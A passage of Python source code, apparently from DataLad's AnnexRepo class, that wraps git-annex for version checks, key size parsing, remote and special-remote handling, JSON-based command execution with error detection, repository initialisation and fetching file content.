MissingExternalDependency(**exc_kwargs)\n elif ver < cls.GIT_ANNEX_MIN_VERSION:\n raise OutdatedExternalDependency(ver_present=ver, **exc_kwargs)\n cls.git_annex_version = ver\n\n @classmethod\n def check_direct_mode_support(cls):\n \"\"\"Does git-annex version support direct mode?\n\n The result is cached at `cls.supports_direct_mode`.\n\n Returns\n -------\n bool\n \"\"\"\n if cls.supports_direct_mode is None:\n warnings.warn(\n \"DataLad's minimum git-annex version is above 7.20190912, \"\n \"the last version to support direct mode. \"\n \"The check_direct_mode_support method \"\n \"and supports_direct_mode attribute will be removed \"\n \"in an upcoming release.\",\n DeprecationWarning)\n cls.supports_direct_mode = False\n return cls.supports_direct_mode\n\n @classmethod\n def check_repository_versions(cls):\n \"\"\"Get information on supported and upgradable repository versions.\n\n The result is cached at `cls.repository_versions`.\n\n Returns\n -------\n dict\n supported -> list of supported versions (int)\n upgradable -> list of upgradable versions (int)\n \"\"\"\n if cls.repository_versions is None:\n key_remap = {\n \"supported repository versions\": \"supported\",\n \"upgrade supported from repository versions\": \"upgradable\"}\n out = GitWitlessRunner().run(\n [\"git\", \"annex\", \"version\"],\n protocol=StdOutErrCapture)\n kvs = (ln.split(\":\", 1) for ln in out['stdout'].splitlines())\n cls.repository_versions = {\n key_remap[k]: list(map(int, v.strip().split()))\n for k, v in kvs if k in key_remap}\n return cls.repository_versions\n\n @classmethod\n def _check_version_kludges(cls, key):\n \"\"\"Cache some annex-version-specific kludges in one go.\n\n Return the kludge under `key`.\n \"\"\"\n kludges = cls._version_kludges\n if kludges:\n return kludges[key]\n\n if cls.git_annex_version is None:\n cls._check_git_annex_version()\n\n ver = cls.git_annex_version\n kludges[\"fromkey-supports-unlocked\"] = ver > \"8.20210428\"\n # applies to get, drop, move, copy, whereis\n kludges[\"grp1-supports-batch-keys\"] = ver >= \"8.20210903\"\n # applies to find, findref to list all known.\n # was added in 10.20221212-17-g0b2dd374d on 20221220.\n kludges[\"find-supports-anything\"] = ver >= \"10.20221213\"\n # applies to log, unannex and may be other commands,\n # was added 10.20230407 release, respecting core.quotepath\n kludges[\"quotepath-respected\"] = \\\n \"yes\" if ver >= '10.20230408' else \\\n \"maybe\" if ver > '10.20230407' else \\\n \"no\"\n cls._version_kludges = kludges\n return kludges[key]\n\n @classmethod\n def _unquote_annex_path(cls, s):\n \"\"\"Remove surrounding \"\" around the filename, and unquote \\\"\n\n This is minimal necessary transformation of the quoted filename in care of\n core.quotepath=false, i.e. whenever all unicode characters remain as is.\n\n All interfaces should aim to operate on --json machine readable output,\n so we are not striving to have it super efficient here since should not be used\n often.\n \"\"\"\n respected = cls._check_version_kludges('quotepath-respected')\n if respected == 'no':\n return s\n quoted = s.startswith('\"') and s.endswith('\"')\n if respected in ('maybe', 'yes'):\n # not necessarily correct if e.g. filename has \"\" around it originally\n # but this is a check only for a range of development versions, so mostly\n # for local/CI runs ATM\n if not quoted:\n return s\n else:\n raise RuntimeError(f\"Got unknown {respected}\")\n return s[1:-1].replace(r'\\\"', '\"')\n\n @staticmethod\n def get_size_from_key(key):\n \"\"\"A little helper to obtain size encoded in a key\n\n Returns\n -------\n int or None\n size of the file or None if either no size is encoded in the key or\n key was None itself\n\n Raises\n ------\n ValueError\n if key is considered invalid (at least its size-related part)\n \"\"\"\n if not key:\n return None\n\n # see: https://git-annex.branchable.com/internals/key_format/\n key_parts = key.split('--')\n key_fields = key_parts[0].split('-')\n parsed = {field[0]: int(field[1:]) if field[1:].isdigit() else None\n for field in key_fields[1:]\n if field[0] in \"sSC\"}\n\n # don't lookup the dict for the same things several times;\n # Is there a faster (and more compact) way of doing this? Note, that\n # locals() can't be updated.\n s = parsed.get('s')\n S = parsed.get('S')\n C = parsed.get('C')\n\n if S is None and C is None:\n return s # also okay if s is None as well -> no size to report\n elif s is None:\n # s is None, while S and/or C are not.\n raise ValueError(\"invalid key: {}\".format(key))\n elif S and C:\n if C <= int(s / S):\n return S\n else:\n return s % S\n else:\n # S or C are given with the respective other one missing\n raise ValueError(\"invalid key: {}\".format(key))\n\n @normalize_path\n def get_file_size(self, path):\n fpath = opj(self.path, path)\n return 0 if not exists(fpath) else os.stat(fpath).st_size\n\n def is_initialized(self):\n \"\"\"quick check whether this appears to be an annex-init'ed repo\n \"\"\"\n # intended to avoid calling self._init, when it's not needed, since this check is clearly\n # cheaper than git-annex-init (which would be safe to just call)\n\n return (self.dot_git / 'annex').exists()\n\n @borrowdoc(GitRepo, 'is_valid_git')\n def is_valid_annex(self, allow_noninitialized=False, check_git=True):\n\n initialized_annex = (self.is_valid_git() if check_git else True) and (self.dot_git / 'annex').exists()\n\n if allow_noninitialized:\n try:\n return initialized_annex or ((self.is_valid_git() if check_git else True) and self.is_with_annex())\n except (NoSuchPathError, InvalidGitRepositoryError):\n return False\n else:\n return initialized_annex\n\n @classmethod\n def is_valid_repo(cls, path, allow_noninitialized=False):\n \"\"\"Return True if given path points to an annex repository\n \"\"\"\n\n def git_file_has_annex(p):\n \"\"\"Return True if `p` contains a .git file, that points to a git\n dir with a subdir 'annex'\"\"\"\n _git = opj(p, '.git')\n if not os.path.isfile(_git):\n return False\n with open(_git, \"r\") as f:\n line = f.readline()\n if line.startswith(\"gitdir: \"):\n return exists(opj(p, line[8:], 'annex'))\n else:\n lgr.debug(\"Invalid .git file: %s\", _git)\n return False\n\n initialized_annex = GitRepo.is_valid_repo(path) and \\\n (exists(opj(path, '.git', 'annex')) or\n git_file_has_annex(path))\n\n if allow_noninitialized:\n try:\n return initialized_annex or GitRepo(path, create=False, init=False).is_with_annex()\n except (NoSuchPathError, InvalidGitRepositoryError):\n return False\n else:\n return initialized_annex\n\n def set_remote_url(self, name, url, push=False):\n \"\"\"Set the URL a remote is pointing to\n\n Sets the URL of the remote `name`. Requires the remote to already exist.\n\n Parameters\n ----------\n name: str\n name of the remote\n url: str\n push: bool\n if True, set the push URL, otherwise the fetch URL;\n if True, additionally set annexurl to `url`, to make sure annex uses\n it to talk to the remote, since access via fetch URL might be\n restricted.\n \"\"\"\n\n if push:\n # if we are to set a push url, also set 'annexUrl' for this remote,\n # in order to make git-annex use it, when talking to the remote.\n # (see http://git-annex.branchable.com/bugs/annex_ignores_pushurl_and_uses_only_url_upon___34__copy_--to__34__/)\n var = 'remote.{0}.{1}'.format(name, 'annexurl')\n self.config.set(var, url, scope='local', reload=True)\n super(AnnexRepo, self).set_remote_url(name, url, push)\n\n def set_remote_dead(self, name):\n \"\"\"Announce to annex that remote is \"dead\"\n \"\"\"\n return self.call_annex([\"dead\", name])\n\n def is_remote_annex_ignored(self, remote):\n \"\"\"Return True if remote is explicitly ignored\"\"\"\n return self.config.getbool(\n 'remote.{}'.format(remote), 'annex-ignore',\n default=False\n )\n\n def is_special_annex_remote(self, remote, check_if_known=True):\n \"\"\"Return whether remote is a special annex remote\n\n Decides based on the presence of an annex- option and lack of a\n configured URL for the remote.\n \"\"\"\n if check_if_known:\n if remote not in self.get_remotes():\n raise RemoteNotAvailableError(remote)\n opts = self.config.options('remote.{}'.format(remote))\n if \"url\" in opts:\n is_special = False\n elif any(o.startswith(\"annex-\") for o in opts\n if o not in [\"annex-uuid\", \"annex-ignore\"]):\n # It's possible that there isn't a special-remote related option\n # (we only filter out a few common ones), but given that there is\n # no URL it should be a good bet that this is a special remote.\n is_special = True\n else:\n is_special = False\n lgr.warning(\"Remote '%s' has no URL or annex- option. \"\n \"Is it mis-configured?\",\n remote)\n return is_special\n\n @borrowkwargs(GitRepo)\n def get_remotes(self,\n with_urls_only=False,\n exclude_special_remotes=False):\n \"\"\"Get known (special-) remotes of the repository\n\n Parameters\n ----------\n exclude_special_remotes: bool, optional\n if True, don't return annex special remotes\n\n Returns\n -------\n remotes : list of str\n List of names of the remotes\n \"\"\"\n remotes = super(AnnexRepo, self).get_remotes(with_urls_only=with_urls_only)\n\n if exclude_special_remotes:\n return [\n remote for remote in remotes\n if not self.is_special_annex_remote(remote, check_if_known=False)\n ]\n else:\n return remotes\n\n def get_special_remotes(self, include_dead:bool = False) -> Dict[str, dict]:\n \"\"\"Get info about all known (not just enabled) special remotes.\n\n The present implementation is not able to report on special remotes\n that have only been configured in a private annex repo\n (annex.private=true).\n\n Parameters\n ----------\n include_dead: bool, optional\n Whether to include remotes announced dead.\n\n Returns\n -------\n dict\n Keys are special remote UUIDs. Each value is a dictionary with\n configuration information git-annex has for the remote. This should\n include the 'type' and 'name' as well as any `initremote` parameters\n that git-annex stores.\n\n Note: This is a faithful translation of git-annex:remote.log with one\n exception. For a special remote initialized with the --sameas flag,\n git-annex stores the special remote name under the \"sameas-name\" key,\n we copy this value under the \"name\" key so that callers don't have to\n check two places for the name. If you need to detect whether you're\n working with a sameas remote, the presence of either \"sameas-name\" or\n \"sameas-uuid\" is a reliable indicator.\n \"\"\"\n argspec = re.compile(r'^([^=]*)=(.*)$')\n srs = {}\n\n # We provide custom implementation to access this metadata since ATM\n # no git-annex command exposes it on CLI.\n #\n # Information will potentially be obtained from remote.log within\n # git-annex branch, and git-annex's journal, which might exist e.g.\n # due to alwayscommit=false operations\n sources = []\n try:\n sources.append(\n list(\n self.call_git_items_(\n ['cat-file', 'blob', 'git-annex:remote.log'],\n read_only=True)\n )\n )\n except CommandError as e:\n if (\n ('Not a valid object name git-annex:remote.log' in e.stderr) or # e.g. git 2.30.2\n (\"fatal: path 'remote.log' does not exist in 'git-annex'\" in e.stderr) # e.g. 2.35.1+next.20220211-1\n ):\n # no special remotes configured - might still be in the journal\n pass\n else:\n # some unforeseen error\n raise e\n\n journal_path = self.dot_git / \"annex\" / \"journal\" / \"remote.log\"\n if journal_path.exists():\n sources.append(journal_path.read_text().splitlines())\n\n for line in chain(*sources):\n # be precise and split by spaces\n fields = line.split(' ')\n # special remote UUID\n sr_id = fields[0]\n # the rest are config args for enableremote\n sr_info = dict(argspec.match(arg).groups()[:2] for arg in fields[1:])\n if \"name\" not in sr_info:\n name = sr_info.get(\"sameas-name\")\n if name is None:\n lgr.warning(\n \"Encountered git-annex remote without a name or \"\n \"sameas-name value: %s\",\n sr_info)\n else:\n sr_info[\"name\"] = name\n srs[sr_id] = sr_info\n\n # remove dead ones\n if not include_dead:\n # code largely copied from drop.py:_detect_nondead_annex_at_remotes\n # but not using -p and rather blob as above\n try:\n for line in self.call_git_items_(\n ['cat-file', 'blob', 'git-annex:trust.log']):\n columns = line.split()\n if columns[1] == 'X':\n # .pop if present\n srs.pop(columns[0], None)\n except CommandError as e:\n # this is not a problem per-se, probably file is not there, just log\n CapturedException(e)\n return srs\n\n def _call_annex(self, args, files=None, jobs=None, protocol=StdOutErrCapture,\n git_options=None, stdin=None, merge_annex_branches=True,\n **kwargs):\n \"\"\"Internal helper to run git-annex commands\n\n Standard command options are applied in addition to the given arguments,\n and certain error conditions are detected (if possible) and dedicated\n exceptions are raised.\n\n Parameters\n ----------\n args: list\n List of git-annex command arguments.\n files: list, optional\n If command passes list of files. If list is too long\n (by number of files or overall size) it will be split, and multiple\n command invocations will follow\n jobs : int or 'auto', optional\n If 'auto', the number of jobs will be determined automatically,\n informed by the configuration setting\n 'datalad.runtime.max-annex-jobs'.\n protocol : WitlessProtocol, optional\n Protocol class to pass to GitWitlessRunner.run(). By default this is\n StdOutErrCapture, which will provide default logging behavior and\n guarantee that stdout/stderr are included in potential CommandError\n exception.\n git_options: list, optional\n Additional arguments for Git to include in the git-annex call\n (in a position prior to the 'annex' subcommand.\n stdin: File-like, optional\n stdin to connect to the git-annex process. Only used when `files`\n is None.\n merge_annex_branches: bool, optional\n If False, annex.merge-annex-branches=false config will be set for\n git-annex call. Useful for operations which are not intended to\n benefit from updating information about remote git-annexes\n **kwargs:\n Additional arguments are passed on to the WitlessProtocol constructor\n\n Returns\n -------\n dict\n Return value of WitlessRunner.run(). The content of the dict is\n determined by the given `protocol`. By default, it provides git-annex's\n stdout and stderr (under these key names)\n\n Raises\n ------\n CommandError\n If the call exits with a non-zero status.\n\n OutOfSpaceError\n If a corresponding statement was detected in git-annex's output on\n stderr. Only supported if the given protocol captured stderr.\n\n RemoteNotAvailableError\n If a corresponding statement was detected in git-annex's output on\n stderr. Only supported if the given protocol captured stderr.\n \"\"\"\n if self.git_annex_version is None:\n self._check_git_annex_version()\n\n # git portion of the command\n cmd = ['git'] + self._ANNEX_GIT_COMMON_OPTIONS\n\n if git_options:\n cmd += git_options\n\n if not self.always_commit:\n cmd += ['-c', 'annex.alwayscommit=false']\n\n if not merge_annex_branches:\n cmd += ['-c', 'annex.merge-annex-branches=false']\n\n # annex portion of the command\n cmd.append('annex')\n cmd += args\n\n if lgr.getEffectiveLevel() <= 8:\n cmd.append('--debug')\n\n if self._annex_common_options:\n cmd += self._annex_common_options\n\n if jobs == 'auto':\n # Limit to # of CPUs (but at least 3 to start with)\n # and also an additional config constraint (by default 1\n # due to https://github.com/datalad/datalad/issues/4404)\n jobs = self._n_auto_jobs or min(\n self.config.obtain('datalad.runtime.max-annex-jobs'),\n max(3, cpu_count()))\n # cache result to avoid repeated calls to cpu_count()\n self._n_auto_jobs = jobs\n if jobs and jobs != 1:\n cmd.append('-J%d' % jobs)\n\n runner = self._git_runner\n env = None\n if self.fake_dates_enabled:\n env = self.add_fake_dates(runner.env)\n\n try:\n if files:\n if issubclass(protocol, GeneratorMixIn):\n return runner.run_on_filelist_chunks_items_(\n cmd,\n files,\n protocol=protocol,\n env=env,\n **kwargs)\n else:\n return runner.run_on_filelist_chunks(\n cmd,\n files,\n protocol=protocol,\n env=env,\n **kwargs)\n else:\n return runner.run(\n cmd,\n stdin=stdin,\n protocol=protocol,\n env=env,\n **kwargs)\n except CommandError as e:\n # Note: A call might result in several 'failures', that can be or\n # cannot be handled here. Detection of something, we can deal with,\n # doesn't mean there's nothing else to deal with.\n\n # OutOfSpaceError:\n # Note:\n # doesn't depend on anything in stdout. Therefore check this before\n # dealing with stdout\n out_of_space_re = re.search(\n \"not enough free space, need (.*) more\", e.stderr\n )\n if out_of_space_re:\n raise OutOfSpaceError(cmd=['annex'] + args,\n sizemore_msg=out_of_space_re.groups()[0])\n\n # RemoteNotAvailableError:\n remote_na_re = re.search(\n \"there is no available git remote named \\\"(.*)\\\"\", e.stderr\n )\n if remote_na_re:\n raise RemoteNotAvailableError(cmd=['annex'] + args,\n remote=remote_na_re.groups()[0])\n\n # TEMP: Workaround for git-annex bug, where it reports success=True\n # for annex add, while simultaneously complaining, that it is in\n # a submodule:\n # TODO: For now just reraise. But independently on this bug, it\n # makes sense to have an exception for that case\n in_subm_re = re.search(\n \"fatal: Pathspec '(.*)' is in submodule '(.*)'\", e.stderr\n )\n if in_subm_re:\n raise e\n\n # we don't know how to handle this, just pass it on\n raise\n\n def _call_annex_records(self, args, files=None, jobs=None,\n git_options=None,\n stdin=None,\n merge_annex_branches=True,\n progress=False,\n **kwargs):\n \"\"\"Internal helper to run git-annex commands with JSON result processing\n\n `_call_annex()` is used for git-annex command execution, using\n AnnexJsonProtocol.\n\n Parameters\n ----------\n args: list\n See `_call_annex()` for details.\n files: list, optional\n See `_call_annex()` for details.\n jobs : int or 'auto', optional\n See `_call_annex()` for details.\n git_options: list, optional\n See `_call_annex()` for details.\n stdin: File-like, optional\n See `_call_annex()` for details.\n merge_annex_branches: bool, optional\n See `_call_annex()` for details.\n **kwargs:\n Additional arguments are passed on to the AnnexJsonProtocol constructor\n\n Returns\n -------\n list(dict)\n List of parsed result records.\n\n Raises\n ------\n CommandError\n See `_call_annex()` for details.\n OutOfSpaceError\n See `_call_annex()` for details.\n RemoteNotAvailableError\n See `_call_annex()` for details.\n RuntimeError\n Output from the git-annex process was captured, but no structured\n records could be parsed.\n \"\"\"\n protocol = AnnexJsonProtocol\n\n args = args[:] + ['--json', '--json-error-messages']\n if progress:\n args += ['--json-progress']\n\n out = None\n try:\n out = self._call_annex(\n args,\n files=files,\n jobs=jobs,\n protocol=protocol,\n git_options=git_options,\n stdin=stdin,\n merge_annex_branches=merge_annex_branches,\n **kwargs,\n )\n except CommandError as e:\n not_existing = None\n if e.kwargs.get('stdout_json'):\n # See if may be it was within stdout_json, as e.g. was added around\n # 10.20230407-99-gbe36e208c2 to 'add' together with\n # 'message-id': 'FileNotFound'\n out = {'stdout_json': e.kwargs.get('stdout_json', [])}\n not_existing = []\n for j in out['stdout_json']:\n if j.get('message-id') == 'FileNotFound':\n not_existing.append(j['file'])\n # for consistency with our \"_fake_json_for_non_existing\" records\n # but not overloading one if there is one\n j.setdefault('note', 'not found')\n\n if not not_existing:\n # Workaround for not existing files as long as older annex doesn't\n # report it within JSON.\n # see http://git-annex.branchable.com/bugs/copy_does_not_reflect_some_failed_copies_in_--json_output/\n not_existing = _get_non_existing_from_annex_output(e.stderr)\n if not_existing:\n if not out:\n out = {'stdout_json': []}\n out['stdout_json'].extend(_fake_json_for_non_existing(not_existing, args[0]))\n\n # Note: insert additional code here to analyse failure and possibly\n # raise a custom exception\n\n # If it was not about non-existing but running failed -- re-raise\n if not not_existing:\n raise e\n\n #if e.stderr:\n # # else just warn about present errors\n # shorten = lambda x: x[:1000] + '...' if len(x) > 1000 else x\n\n # _log = lgr.debug if kwargs.get('expect_fail', False) else lgr.warning\n # _log(\n # \"Running %s resulted in stderr output: %s\",\n # args, shorten(e.stderr)\n # )\n\n # git-annex fails to non-zero exit when reporting an error on\n # non-existing paths in some versions and/or commands.\n # Hence, check for it on non-failure, too. This became apparent with\n # annex 10.20220222, but was a somewhat \"hidden\" issue for longer.\n #\n # Note, that this may become unnecessary after annex'\n # ce91f10132805d11448896304821b0aa9c6d9845 (Feb 28, 2022)\n # \"fix annex.skipunknown false error propagation\"\n if 'stderr' in out:\n not_existing = _get_non_existing_from_annex_output(out['stderr'])\n if not_existing:\n if out is None:\n out = {'stdout_json': []}\n out['stdout_json'].extend(\n _fake_json_for_non_existing(not_existing, args[0])\n )\n\n json_objects = out.pop('stdout_json')\n\n if out.get('stdout'):\n if json_objects:\n # We at least received some valid json output, so warn about\n # non-json output and continue.\n lgr.warning(\"Received non-json lines for --json command: %s\",\n out)\n else:\n raise RuntimeError(\n \"Received no json output for --json command, only:\\n{}\"\n .format(out))\n\n # A special remote might send a message via \"info\". This is supposed\n # to be printed by annex but in case of\n # `--json` is returned by annex as \"{'info': '<message>'}\". See\n # https://git-annex.branchable.com/design/external_special_remote_protocol/#index5h2\n #\n # So, Ben thinks we should just spit it out here, since everything\n # calling _call_annex_records is concerned with the actual results\n # being returned. Moreover, this kind of response is special to\n # particular special remotes rather than particular annex commands.\n # So, likely there's nothing callers could do about it other than\n # spitting it out.\n return_objects = []\n for obj in json_objects:\n if len(obj.keys()) == 1 and obj['info']:\n lgr.info(obj['info'])\n else:\n return_objects.append(obj)\n\n return return_objects\n\n def _call_annex_records_items_(self,\n args,\n files=None,\n jobs=None,\n git_options=None,\n stdin=None,\n merge_annex_branches=True,\n progress=False,\n **kwargs):\n \"\"\"Yielding git-annex command execution with JSON result processing\n\n `_call_annex()` is used for git-annex command execution, using\n GeneratorAnnexJsonProtocol. This means _call_annex() will yield\n results as soon as they are available.\n\n For a description of the parameters and raised exceptions, please\n refer to _call_annex_records().\n\n Returns\n -------\n Generator(something)\n list(dict)\n List of parsed result records.\n \"\"\"\n protocol_class = GeneratorAnnexJsonProtocol\n\n args = args[:] + ['--json', '--json-error-messages']\n if progress:\n args += ['--json-progress']\n\n json_objects_received = False\n try:\n for json_object in self._call_annex(\n args,\n files=files,\n jobs=jobs,\n protocol=protocol_class,\n git_options=git_options,\n stdin=stdin,\n merge_annex_branches=merge_annex_branches,\n **kwargs):\n if len(json_object) == 1 and json_object.get('info', None):\n lgr.info(json_object['info'])\n else:\n json_objects_received = True\n yield json_object\n\n except CommandError as e:\n # Note: Workaround for not existing files as long as annex doesn't\n # report it within JSON response:\n # see http://git-annex.branchable.com/bugs/copy_does_not_reflect_some_failed_copies_in_--json_output/\n not_existing = _get_non_existing_from_annex_output(e.stderr)\n yield from _fake_json_for_non_existing(not_existing, args[0])\n\n # Note: insert additional code here to analyse failure and possibly\n # raise a custom exception\n\n # if we didn't raise before, just depend on whether or not we seem\n # to have some json to return. It should contain information on\n # failure in keys 'success' and 'note'\n # TODO: This is not entirely true. 'annex status' may return empty,\n # while there was a 'fatal:...' in stderr, which should be a\n # failure/exception\n # Or if we had empty stdout but there was stderr\n if json_objects_received is False and e.stderr:\n raise e\n\n # In contrast to _call_annex_records, this method does not warn about\n # additional non-JSON data on stdout, nor does is raise a RuntimeError\n # if only non-JSON data was received on stdout.\n return\n\n def call_annex_records(self, args, files=None):\n \"\"\"Call annex with `--json*` to request structured result records\n\n This method behaves like `call_annex()`, but returns parsed result\n records.\n\n Parameters\n ----------\n args : list of str\n Arguments to pass to `annex`.\n files : list of str, optional\n File arguments to pass to `annex`. The advantage of passing these here\n rather than as part of `args` is that the call will be split into\n multiple calls to avoid exceeding the maximum command line length.\n\n Returns\n -------\n list(dict)\n List of parsed result records.\n\n Raises\n ------\n CommandError if the call exits with a non-zero status. All result\n records captured until the non-zero exit are available in the\n exception's `kwargs`-dict attribute under key 'stdout_json'.\n\n See `_call_annex()` for more information on Exceptions.\n \"\"\"\n return self._call_annex_records(args, files=files)\n\n def call_annex(self, args, files=None):\n \"\"\"Call annex and return standard output.\n\n Parameters\n ----------\n args : list of str\n Arguments to pass to `annex`.\n files : list of str, optional\n File arguments to pass to `annex`. The advantage of passing these here\n rather than as part of `args` is that the call will be split into\n multiple calls to avoid exceeding the maximum command line length.\n\n Returns\n -------\n standard output (str)\n\n Raises\n ------\n See `_call_annex()` for information on Exceptions.\n \"\"\"\n return self._call_annex(\n args,\n files=files,\n protocol=StdOutErrCapture)['stdout']\n\n def call_annex_success(self, args, files=None):\n \"\"\"Call git-annex and return true if the call exit code of 0.\n\n All parameters match those described for `call_annex`.\n\n Returns\n -------\n bool\n \"\"\"\n try:\n self.call_annex(args, files)\n except CommandError:\n return False\n return True\n\n def call_annex_items_(self, args, files=None, sep=None):\n \"\"\"Call git-annex, splitting output on `sep`.\n\n Parameters\n ----------\n args : list of str\n Arguments to pass to `git-annex`.\n files : list of str, optional\n File arguments to pass to `annex`. The advantage of passing these here\n rather than as part of `args` is that the call will be split into\n multiple calls to avoid exceeding the maximum command line length.\n sep : str, optional\n Split the output by `str.split(sep)` rather than `str.splitlines`.\n\n Returns\n -------\n Generator that yields output items.\n\n Raises\n ------\n See `_call_annex()` for information on Exceptions.\n \"\"\"\n class GeneratorStdOutErrCapture(GeneratorMixIn,\n AssemblingDecoderMixIn,\n StdOutErrCapture):\n def __init__(self):\n GeneratorMixIn.__init__(self)\n AssemblingDecoderMixIn.__init__(self)\n StdOutErrCapture.__init__(self)\n\n def pipe_data_received(self, fd, data):\n if fd == 1:\n self.send_result(\n (\"stdout\", self.decode(fd, data, self.encoding)))\n return\n super().pipe_data_received(fd, data)\n\n line_splitter = LineSplitter(separator=sep)\n for source, content in self._call_annex(\n args,\n files=files,\n protocol=GeneratorStdOutErrCapture):\n\n if source == \"stdout\":\n yield from line_splitter.process(content)\n\n remaining_content = line_splitter.finish_processing()\n if remaining_content is not None:\n yield remaining_content\n\n def call_annex_oneline(self, args, files=None):\n \"\"\"Call annex for a single line of output.\n\n This method filters prior output line selection to exclude git-annex\n status output that is triggered by command execution, but is not\n related to the particular command. This includes lines like:\n\n (merging ... into git-annex)\n (recording state ...)\n\n Parameters\n ----------\n args : list of str\n Arguments to pass to `annex`.\n files : list of str, optional\n File arguments to pass to `annex`. The advantage of passing these here\n rather than as part of `args` is that the call will be split into\n multiple calls to avoid exceeding the maximum command line length.\n\n Returns\n -------\n str\n Either a single output line, or an empty string if there was no\n output.\n Raises\n ------\n AssertionError if there is more than one line of output.\n\n See `_call_annex()` for information on Exceptions.\n \"\"\"\n # ignore some lines\n # see https://git-annex.branchable.com/todo/output_of_wanted___40__and_possibly_group_etc__41___should_not_be_polluted_with___34__informational__34___messages/\n # that links claims it is fixed, but '(recording state in git...)'\n # still appear as of 8.20201103-1\n lines = [\n l for l in self.call_annex_items_(args, files=files)\n if l and not re.search(\n r'\\((merging .* into git-annex|recording state ).*\\.\\.\\.\\)', l\n )\n ]\n\n if len(lines) > 1:\n raise AssertionError(\n \"Expected {} to return single line, but it returned {}\"\n .format([\"git\", 'annex'] + args, lines))\n return lines[0] if lines else ''\n\n def _is_direct_mode_from_config(self):\n \"\"\"Figure out if in direct mode from the git config.\n\n Since relies on reading config, expensive to be used often\n\n Returns\n -------\n True if in direct mode, False otherwise.\n \"\"\"\n # If .git/config lacks an entry \"direct\",\n # it's actually indirect mode.\n self.config.reload()\n return self.config.getbool(\"annex\", \"direct\", False)\n\n def is_direct_mode(self):\n \"\"\"Return True if annex is in direct mode\n\n Returns\n -------\n True if in direct mode, False otherwise.\n \"\"\"\n self._direct_mode = None\n\n if self._direct_mode is None:\n # we need to figure it out\n self._direct_mode = self._is_direct_mode_from_config()\n return self._direct_mode\n\n def is_crippled_fs(self):\n \"\"\"Return True if git-annex considers current filesystem 'crippled'.\n\n Returns\n -------\n True if on crippled filesystem, False otherwise\n \"\"\"\n\n self.config.reload()\n return self.config.getbool(\"annex\", \"crippledfilesystem\", False)\n\n @property\n def supports_unlocked_pointers(self):\n \"\"\"Return True if repository version supports unlocked pointers.\n \"\"\"\n try:\n return self.config.getint(\"annex\", \"version\") >= 6\n except KeyError:\n # If annex.version isn't set (e.g., an uninitialized repo), assume\n # that unlocked pointers are supported given that they are with the\n # minimum git-annex version.\n return True\n\n def _init(self, version=None, description=None):\n \"\"\"Initializes an annex repository.\n\n Note: This is intended for private use in this class by now.\n If you have an object of this class already,\n there shouldn't be a need to 'init' again.\n\n \"\"\"\n # MIH: this function is required for re-initing repos. The logic\n # in the constructor is rather convoluted and doesn't acknowledge\n # the case of a perfectly healthy annex that just needs a new\n # description\n # will keep leading underscore in the name for know, but this is\n # not private\n # TODO: provide git and git-annex options.\n opts = []\n if description is not None:\n opts += [description]\n if version is not None:\n version = str(version)\n supported_versions = AnnexRepo.check_repository_versions()['supported']\n if version not in supported_versions:\n first_supported_version = int(supported_versions[0])\n if int(version) < first_supported_version:\n lgr.info(\"Annex repository version %s will be upgraded to %s or later version\",\n version, first_supported_version)\n # and if it is higher than any supported -- we will just let git-annex to do\n # what it wants to do\n opts += ['--version', '{0}'.format(version)]\n\n # TODO: RM DIRECT? or RF at least ?\n # Note: git-annex-init kills a possible tracking branch for\n # 'annex/direct/my_branch', if we just cloned from a repo in direct\n # mode. We want to preserve the information about the tracking branch,\n # as if the source repo wasn't in direct mode.\n # Note 2: Actually we do it for all 'managed branches'. This might turn\n # out to not be necessary\n sections_to_preserve = [\"branch.{}\".format(branch)\n for branch in self.get_branches()\n if self.is_managed_branch(branch)\n and \"branch.{}\".format(branch) in\n self.config.sections()]\n for sct in sections_to_preserve:\n orig_branch = sct[7:]\n new_branch = \\\n self.get_corresponding_branch(orig_branch) or orig_branch\n new_section = \"branch.{}\".format(new_branch)\n for opt in self.config.options(sct):\n orig_value = self.config.get_value(sct, opt)\n new_value = orig_value.replace(orig_branch, new_branch)\n self.config.add(var=new_section + \".\" + opt,\n value=new_value,\n scope='local',\n reload=False)\n self._call_annex(['init'] + opts, protocol=AnnexInitOutput)\n # TODO: When to expect stderr?\n # on crippled filesystem for example (think so)?\n self.config.reload()\n\n @normalize_paths\n def get(self, files, remote=None, options=None, jobs=None, key=False):\n \"\"\"Get the actual content of files\n\n Parameters\n ----------\n files : list of str\n paths to get\n remote : str, optional\n from which remote to fetch content\n options : list of str, optional\n commandline options for the git annex get command\n jobs : int or None, optional\n how many jobs to run in parallel (passed to git-annex call).\n If not specified (None), then\n key : bool, optional\n If provided file value is actually a key\n\n Returns\n -------\n files : list of dict\n \"\"\"\n options = options[:] if options else []\n\n if self.config.get(\"annex.retry\") is None:\n options.extend(\n [\"-c\",\n \"annex.retry={}\".format(\n self.config.obtain(\"datalad.annex.retry\"))])\n\n if remote:\n if remote not in self.get_remotes():\n raise RemoteNotAvailableError(\n remote=remote,\n cmd=\"annex get\",\n msg=\"Remote is not known. Known are: %s\"\n % (self.get_remotes(),)\n )\n self._maybe_open_ssh_connection(remote)\n options += ['--from', remote]\n\n # analyze provided files to decide which actually are needed to be\n # fetched\n\n if not key:\n expected_downloads, fetch_files = self._get_expected_files(\n files, ['--not', '--in', '.'],\n merge_annex_branches=False # interested only in local info\n )\n else:\n fetch_files = files\n assert len(files) == 1, \"When key=True only a single file be provided\"\n expected_downloads = {files[0]: AnnexRepo.get_size_from_key(files[0])}\n\n if not fetch_files:\n lgr.debug(\"No files found needing fetching.\")\n return []\n\n if len(fetch_files) != len(files):\n lgr.debug(\"Actually getting %d files\", len(fetch_files))\n\n # TODO: provide more meaningful message (possibly aggregating 'note'\n # from annex failed ones\n # TODO: reproduce DK's bug on OSX, and either switch to\n # --batch mode (I don't think we have --progress support in long\n # alive batch processes ATM),\n if key:\n cmd = ['get'] + options + ['--key'] + files\n files_arg = None\n else:\n cmd = ['get'] + options\n files_arg = files\n results = self._call_annex_records(\n cmd,\n # TODO: eventually make use of --batch mode\n files=files_arg,\n jobs=jobs,\n progress=True,\n # filter(bool, to avoid trying to add up None's when size is not known\n total_nbytes=sum(filter(bool, expected_downloads.values())),\n )\n results_list = list(results)\n # TODO: should we here compare fetch_files against result_list\n # and vomit an exception of incomplete download????\n return results_list\n\n def _get_expected_files(self, files, expr, merge_annex_branches=True):\n \"\"\"Given a list of files, figure out what to be downloaded\n\n Parameters\n ----------\n files\n expr: list\n Expression to be passed into annex's find\n\n Returns\n -------\n expected_files : dict\n key -> size\n fetch_files : list\n files to be fetched\n \"\"\"\n lgr.debug(\"Determine what files match the query to work with\")\n # Let's figure out first which files/keys and of what size to download\n expected_files = 